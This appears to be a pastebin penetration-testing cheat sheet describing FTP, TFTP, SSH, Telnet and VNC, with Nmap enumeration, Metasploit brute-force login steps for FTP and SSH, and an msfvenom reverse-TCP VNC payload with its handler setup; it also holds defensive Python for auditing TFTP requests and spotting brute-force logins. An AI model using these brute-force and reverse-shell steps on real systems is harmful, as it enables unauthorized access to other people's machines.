Mukezh

PROTOCOLS

Nov 26th, 2018
PROTOCOLS - DEFINITION, ENUMERATION AND VAPT HIERARCHY
=======================================================

1. FTP
=======

FTP is an acronym that stands for File Transfer Protocol. An FTP client is a program that allows you to easily move files from one computer to another.
An FTP server listens on TCP port 21 for incoming connection requests from FTP clients. The server uses this port to control the connection and opens a separate port for transferring file data.
FTP supports two modes of data transfer: plain text (ASCII) and binary. You set the mode in the FTP client. A common error when using FTP is attempting to transfer a binary file (such as a program or music file) while in text mode, which leaves the transferred file unusable.

Enumeration via Nmap

> nmap -Pn -sS -A -p21 TargetIP

Attacks on FTP

> Banner Grabbing : Reconnaissance technique used to gain information about a computer system on a network and the services running on its open ports.

MSF > use auxiliary/scanner/ftp/ftp_version
> set rhosts
> exploit

> Brute Forcing : Brute forcing is a trial-and-error method used by application programs to decode encrypted data such as passwords, trying candidates exhaustively, often guided by wordlists or other strategies.

MSF > use auxiliary/scanner/ftp/ftp_login
> set rhosts
> set user_file rockyou.txt
> set pass_file rockyou.txt
> set stop_on_success true
> exploit


2. TFTP
=======

TFTP stands for Trivial File Transfer Protocol. It's a technology for transferring files between network devices and is a simplified version of File Transfer Protocol.
Today, TFTP is usually found on routers, both consumer broadband routers and commercial network routers.

TFTP can also be used to remotely start a computer and back up network or router configuration files.

TFTP relies on UDP for transporting data, using UDP port number 69.

Differences between TFTP and FTP
- Unlike FTP, TFTP has no login feature, so it doesn't prompt for a username and password. Avoid using TFTP to share sensitive files: you can't protect them or audit their access.
- Listing, renaming, and deleting files over TFTP is usually not allowed.

Enumeration via Nmap
> nmap -Pn -sU -p69 --script tftp-enum TargetIP
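The TFTP section above points out that there is no login and no way to audit access. The following is an added example, not part of the original paste: it decodes TFTP read/write requests as laid out in RFC 1350 (with RFC 2347 options) and turns a batch of UDP/69 payloads into audit rows, flagging writes and path-traversal filenames. The client addresses and packets are constructed for the example.

```python
# TFTP opcodes from RFC 1350: 1 = read request (RRQ), 2 = write request (WRQ)
TFTP_OPCODES = {1: "RRQ", 2: "WRQ"}

def parse_tftp_request(payload: bytes) -> dict:
    """Decode a TFTP RRQ/WRQ: 2-byte opcode | filename | 0 | mode | 0 [| name | 0 | value | 0 ...]."""
    opcode = int.from_bytes(payload[:2], "big")  # network byte order; short input yields an invalid opcode
    if opcode not in TFTP_OPCODES:
        raise ValueError(f"opcode {opcode} is not RRQ/WRQ")
    fields = payload[2:].split(b"\x00")
    # A well-formed request ends in 0x00, so split() leaves a trailing empty field
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("missing NUL terminator after filename or mode")
    fields = fields[:-1]
    filename = fields[0].decode("ascii", "replace")
    mode = fields[1].decode("ascii", "replace").lower()  # mode is case-insensitive
    if mode not in ("netascii", "octet", "mail"):
        raise ValueError(f"unknown transfer mode {mode!r}")
    extra = fields[2:]  # RFC 2347 options come as name/value pairs (blksize, tsize, ...)
    if len(extra) % 2:
        raise ValueError("option name without a value")
    options = {extra[i].decode("ascii", "replace"): extra[i + 1].decode("ascii", "replace")
               for i in range(0, len(extra), 2)}
    return {"op": TFTP_OPCODES[opcode], "filename": filename, "mode": mode, "options": options}

def audit_tftp_requests(packets):
    """Map (client_ip, payload) pairs to audit rows (client, op, filename, flags)."""
    # No login means the request itself is the control point: writes (config
    # overwrite risk) and path traversal are flagged; unparseable payloads are reported.
    rows = []
    for client, payload in packets:
        try:
            req = parse_tftp_request(payload)
        except ValueError as exc:
            rows.append((client, "MALFORMED", "", str(exc)))
            continue
        flags = []
        if req["op"] == "WRQ":
            flags.append("write")
        if ".." in req["filename"] or req["filename"].startswith("/"):
            flags.append("traversal")
        rows.append((client, req["op"], req["filename"], ",".join(flags) or "-"))
    return rows

# Constructed sample traffic, not captured from any real device
SAMPLE_PACKETS = [
    ("192.0.2.7", b"\x00\x01router.cfg\x00octet\x00"),
    ("192.0.2.8", b"\x00\x02startup-config\x00NETASCII\x00blksize\x001024\x00"),
    ("192.0.2.9", b"\x00\x01../../etc/passwd\x00octet\x00"),
    ("192.0.2.9", b"\x00\x05not-a-request"),
]
```

Feed `audit_tftp_requests` the UDP payloads extracted from a capture of port 69 traffic (for example with a pcap library) to get the access log the protocol itself never produces.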

SFTP = FTP + SSHv2.0


3. SSH
======

SSH stands for "Secure Shell". SSH uses port 22 to connect your computer to another computer on the internet. Network administrators use this technique so they can remotely log in to / remotely control a business server in some other part of the city.

Examples of using SSH:

- Your email administrator needs to reboot the company email server from his home.
- Your network administrator needs to reset your office password while she is sitting in a different office or is away at a conference.

In short, Secure Socket Shell is a network protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.



- apt-get install openssh-server
-

Enumeration using Nmap

> nmap -Pn -sS -p22 -A TargetIP

Attacks on SSH

> Banner Grabbing
MSF > use auxiliary/scanner/ssh/ssh_version
> set rhosts
> set rport
> exploit

> Brute Forcing on SSH login
MSF > use auxiliary/scanner/ssh/ssh_login
> set rhosts
> set rport
> set userpass_file
> exploit
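The ftp_login and ssh_login runs described in the FTP and SSH sections leave a distinctive trail on the server. This added example, not part of the original paste, parses constructed log lines in the default vsftpd log format and the OpenSSH auth.log format, counts failed logins per source, and marks sources where a login succeeded after the failure threshold was already reached, which is the case where blocking the IP is not enough and the account needs a reset. The threshold, log lines and addresses are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed sample lines in vsftpd log and OpenSSH auth.log formats, not real captures
SAMPLE_LOGS = """\
Mon Nov 26 10:00:01 2018 [pid 2101] [admin] FAIL LOGIN: Client "203.0.113.9"
Mon Nov 26 10:00:02 2018 [pid 2102] [admin] FAIL LOGIN: Client "203.0.113.9"
Mon Nov 26 10:00:02 2018 [pid 2103] [root] FAIL LOGIN: Client "203.0.113.9"
Mon Nov 26 10:00:03 2018 [pid 2104] [ftp] FAIL LOGIN: Client "203.0.113.9"
Mon Nov 26 10:00:04 2018 [pid 2105] [backup] FAIL LOGIN: Client "203.0.113.9"
Mon Nov 26 10:00:05 2018 [pid 2106] [backup] OK LOGIN: Client "203.0.113.9"
Mon Nov 26 10:02:00 2018 [pid 2107] [alice] FAIL LOGIN: Client "198.51.100.4"
Nov 26 10:05:01 host sshd[3001]: Failed password for invalid user admin from 203.0.113.9 port 50211 ssh2
Nov 26 10:05:01 host sshd[3002]: Failed password for root from 203.0.113.9 port 50212 ssh2
Nov 26 10:05:02 host sshd[3003]: Failed password for invalid user test from 203.0.113.9 port 50213 ssh2
Nov 26 10:05:02 host sshd[3004]: Failed password for invalid user guest from 203.0.113.9 port 50214 ssh2
Nov 26 10:05:03 host sshd[3005]: Failed password for invalid user oracle from 203.0.113.9 port 50215 ssh2
Nov 26 10:07:00 host sshd[3006]: Accepted password for bob from 198.51.100.4 port 50300 ssh2
"""

VSFTPD_RE = re.compile(r'\[(?P<user>[^\]]*)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[^"]+)"')
SSHD_RE = re.compile(r'sshd\[\d+\]: (?P<result>Failed|Accepted) password for '
                     r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')

def parse_auth_events(text):
    """Yield (service, ip, user, success) from mixed vsftpd/sshd lines; other lines are skipped."""
    for line in text.splitlines():
        m = VSFTPD_RE.search(line)
        if m:
            yield ("ftp", m["ip"], m["user"], m["result"] == "OK")
            continue
        m = SSHD_RE.search(line)
        if m:
            yield ("ssh", m["ip"], m["user"], m["result"] == "Accepted")

def detect_bruteforce(text, threshold=5):
    """Return {(service, ip): {"failures", "users", "success_after"}} for sources with at
    least `threshold` failed logins. success_after=True means a login succeeded after the
    threshold was reached: the guessing likely worked, so reset the account, not just block the IP."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "success_after": False})
    for service, ip, user, success in parse_auth_events(text):
        entry = stats[(service, ip)]
        if not success:
            entry["failures"] += 1
            entry["users"].add(user)  # many distinct users from one IP = wordlist/spraying pattern
        elif entry["failures"] >= threshold:
            entry["success_after"] = True
    return {key: {"failures": v["failures"], "users": sorted(v["users"]),
                  "success_after": v["success_after"]}
            for key, v in stats.items() if v["failures"] >= threshold}
```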


4. TELNET
==========

Telnet refers to a network virtual terminal protocol. The acronym comes from "teletype network," "terminal network," or "telecommunications network," depending on which source you believe, and it was built to be a form of remote control to manage mainframe computers from distant terminals.

In time, insecure Telnet evolved into a newer network protocol called Secure Socket Shell (SSH), which modern network administrators use to manage Linux and Unix computers from a distance. SSH provides strong authentication and secure encrypted data communications between computers over an insecure network.

Enumeration using Nmap

> nmap -sSV -p23 TargetIP

Main disadvantage of using Telnet : it sends user credentials in plain text.


5. VNC
=======

VNC (Virtual Network Computing) is a technology for remote desktop sharing, a form of remote access on computer networks. VNC enables the visual desktop display of one computer to be remotely viewed and controlled over a network connection.

Remote desktop technology like VNC is useful on home computer networks, allowing someone to access their desktop from another part of the house or while traveling. It is also useful for network administrators in business environments, such as Information Technology (IT) departments that need to remotely troubleshoot employees' systems.


Attacking Methods
==================

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > vnc.exe

--

use exploit/multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport
msf exploit(handler) > set viewonly false
msf exploit(handler) > run


--------------------


SMB ETERNAL BIBLE - https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html